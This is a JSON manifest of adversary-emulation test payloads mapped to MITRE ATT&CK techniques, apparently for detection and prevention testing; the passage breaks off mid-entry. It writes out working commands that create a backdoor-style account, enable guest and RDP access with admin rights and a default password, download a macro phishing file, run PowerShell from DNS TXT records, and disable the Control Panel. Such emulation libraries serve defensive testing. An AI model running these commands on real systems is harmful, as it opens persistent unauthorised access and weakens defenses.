manifest.json

[
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Create local account",
      "payload_description": "An adversary may wish to create an account with admin privileges to work with. In this test we create a \"art\" user with the password art, switch to art, execute whoami, exit and delete the art user.\n",
      "payload_platforms": [
        "Linux"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "70651959-5a3e-4a7d-aaa5-89b7312a21b1",
          "attack_pattern_name": "Local Accounts",
          "attack_pattern_description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
          "attack_pattern_external_id": "T1078.003",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "bash",
      "payload_cleanup_command": "[ \"$(uname)\" = 'Linux' ] && userdel art -rf || rmuser -y art\n",
      "payload_elevation_required": true,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "84ad1dfe-0b96-452c-a122-4767aab6584e",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:04.165921Z",
      "payload_updated_at": "2025-07-28T04:00:51.234396Z",
      "command_executor": "bash",
      "command_content": "password=$(openssl passwd -1 art)\n([ \"$(uname)\" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))\nsu art -c \"whoami; exit\"\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "70651959-5a3e-4a7d-aaa5-89b7312a21b1",
        "attack_pattern_name": "Local Accounts",
        "attack_pattern_description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
        "attack_pattern_external_id": "T1078.003",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Enable Guest Account",
      "payload_description": "This test enables the guest account on macOS using sysadminctl utility.",
      "payload_platforms": [
        "MacOS"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "4215bcaa-1c5e-4ea0-b9a1-1fd3ff93fa57",
          "attack_pattern_name": "Default Accounts",
          "attack_pattern_description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
          "attack_pattern_external_id": "T1078.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "sh",
      "payload_cleanup_command": "sudo sysadminctl -guestAccount off",
      "payload_elevation_required": true,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "3bf77fd9-fdda-41d2-82b0-0da5744a5f69",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:47:56.836293Z",
      "payload_updated_at": "2025-07-30T05:30:52.819944Z",
      "command_executor": "sh",
      "command_content": "sudo sysadminctl -guestAccount on",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "4215bcaa-1c5e-4ea0-b9a1-1fd3ff93fa57",
        "attack_pattern_name": "Default Accounts",
        "attack_pattern_description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
        "attack_pattern_external_id": "T1078.001",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Activate Guest Account",
      "payload_description": "The Adversaries can activate the default Guest user. The guest account is inactivated by default\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "4215bcaa-1c5e-4ea0-b9a1-1fd3ff93fa57",
          "attack_pattern_name": "Default Accounts",
          "attack_pattern_description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
          "attack_pattern_external_id": "T1078.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "cmd",
      "payload_cleanup_command": "net user #{guest_user} /active:no\n",
      "payload_elevation_required": true,
      "payload_arguments": [
        {
          "type": "text",
          "key": "guest_user",
          "default_value": "guest",
          "description": null,
          "separator": null
        }
      ],
      "payload_prerequisites": [],
      "payload_external_id": "8b8ecda8-7cfd-4b3e-9f22-f052c8119106",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_tags": [],
      "payload_created_at": "2025-06-20T09:47:56.808477Z",
      "payload_updated_at": "2025-06-29T12:34:33.717173Z",
      "payload_output_parsers": [],
      "command_executor": "cmd",
      "command_content": "net user #{guest_user} /active:yes\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "4215bcaa-1c5e-4ea0-b9a1-1fd3ff93fa57",
        "attack_pattern_name": "Default Accounts",
        "attack_pattern_description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
        "attack_pattern_external_id": "T1078.001",
        "attack_pattern_kill_chain_phases": null
      }
    ]
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Download Macro-Enabled Phishing Attachment",
      "payload_description": "This test downloads a macro enabled document, simulating an end user clicking a phishing link to download the file.\nThe file \"PhishingAttachment.xlsm\" is downloaded to the %temp% directory.\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "c57b569b-3e99-4b0a-b9e2-51897e691876",
          "attack_pattern_name": "Spearphishing Attachment",
          "attack_pattern_description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",
          "attack_pattern_external_id": "T1566.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "psh",
      "payload_cleanup_command": "Remove-Item $env:TEMP\\PhishingAttachment.xlsm -ErrorAction Ignore\n",
      "payload_elevation_required": false,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "eade458c-938e-4b32-b6db-7ce9cec57e4a",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:40.124609Z",
      "payload_updated_at": "2025-07-30T05:40:44.512254Z",
      "command_executor": "psh",
      "command_content": "$url = 'https://github.com/OpenAEV-Platform/payloads/raw/refs/heads/main/attack/01-enterprise/02-initial-access/windows/Download%20Macro-Enabled%20Phishing%20Attachment/bin/PhishingAttachment.xlsm'\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "c57b569b-3e99-4b0a-b9e2-51897e691876",
        "attack_pattern_name": "Spearphishing Attachment",
        "attack_pattern_description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",
        "attack_pattern_external_id": "T1566.001",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Enable Guest account with RDP capability and admin privileges",
      "payload_description": "After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,\nand desktop will allow multiple RDP connections.\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "4215bcaa-1c5e-4ea0-b9a1-1fd3ff93fa57",
          "attack_pattern_name": "Default Accounts",
          "attack_pattern_description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
          "attack_pattern_external_id": "T1078.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "cmd",
      "payload_cleanup_command": "net user #{guest_user} /active:no >nul 2>&1\nnet localgroup #{local_admin_group} #{guest_user} /delete >nul 2>&1\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /delete >nul 2>&1\nif #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)\nif #{remove_rdp_access_during_cleanup} EQU 1 (reg delete \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /f >nul 2>&1)\nif #{remove_rdp_access_during_cleanup} EQU 1 (reg delete \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /f >nul 2>&1)",
      "payload_elevation_required": true,
      "payload_arguments": [
        {
          "type": "text",
          "key": "guest_user",
          "default_value": "guest",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "guest_password",
          "default_value": "Password123!",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "local_admin_group",
          "default_value": "Administrators",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "remote_desktop_users_group_name",
          "default_value": "Remote Desktop Users",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "remove_rdp_access_during_cleanup",
          "default_value": "0",
          "description": null,
          "separator": null
        }
      ],
      "payload_prerequisites": [],
      "payload_external_id": "f2c12fda-3ea2-4b5e-a0a3-cc5900784d3b",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:47:56.777864Z",
      "payload_updated_at": "2025-07-30T05:35:12.687745Z",
      "command_executor": "cmd",
      "command_content": "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "4215bcaa-1c5e-4ea0-b9a1-1fd3ff93fa57",
        "attack_pattern_name": "Default Accounts",
        "attack_pattern_description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
        "attack_pattern_external_id": "T1078.001",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Abuse Nslookup with DNS Records",
      "payload_description": "Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.\n[reference](https://twitter.com/jstrosch/status/1237382986557001729)\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "14080352-5e7a-418e-bc3a-36517570782e",
          "attack_pattern_name": "PowerShell",
          "attack_pattern_description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",
          "attack_pattern_external_id": "T1059.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": null,
      "payload_cleanup_command": null,
      "payload_elevation_required": false,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "c900ee64-bec7-4ebf-abf8-64da7e2e70df",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-08-24T10:16:02.282219Z",
      "payload_updated_at": "2025-08-24T10:16:45.159812Z",
      "command_executor": "psh",
      "command_content": "# creating a custom nslookup function that will indeed call nslookup but forces the result to be \"whoami\"\n# this would not be part of a real attack but helpful for this simulation\nfunction nslookup  { &\"$env:windir\\system32\\nslookup.exe\" @args | Out-Null; @(\"\",\"whoami\")}\npowershell .(nslookup -q=txt example.com 8.8.8.8)[-1]\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        },
        {
          "domain_name": "Network",
          "domain_color": "#009933"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "14080352-5e7a-418e-bc3a-36517570782e",
        "attack_pattern_name": "PowerShell",
        "attack_pattern_description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",
        "attack_pattern_external_id": "T1059.001",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Activate Windows NoControlPanel Group Policy Feature",
      "payload_description": "Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. \nTake note that some Group Policy changes might require a restart to take effect.\nSee how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "3042750e-67ea-44de-b99d-d3f30398fed1",
          "attack_pattern_name": "Modify Registry",
          "attack_pattern_description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\n\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\n\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\n\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)",
          "attack_pattern_external_id": "T1112",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "cmd",
      "payload_cleanup_command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v NoControlPanel /f >nul 2>&1\n",
      "payload_elevation_required": true,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "0ca8c46c-3f2c-4c5f-9f32-cf6b68eeb3d7",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-08-24T10:25:43.107737Z",
      "payload_updated_at": "2025-08-24T10:26:12.809465Z",
      "command_executor": "cmd",
      "command_content": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v NoControlPanel /t REG_DWORD /d 1 /f\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "3042750e-67ea-44de-b99d-d3f30398fed1",
        "attack_pattern_name": "Modify Registry",
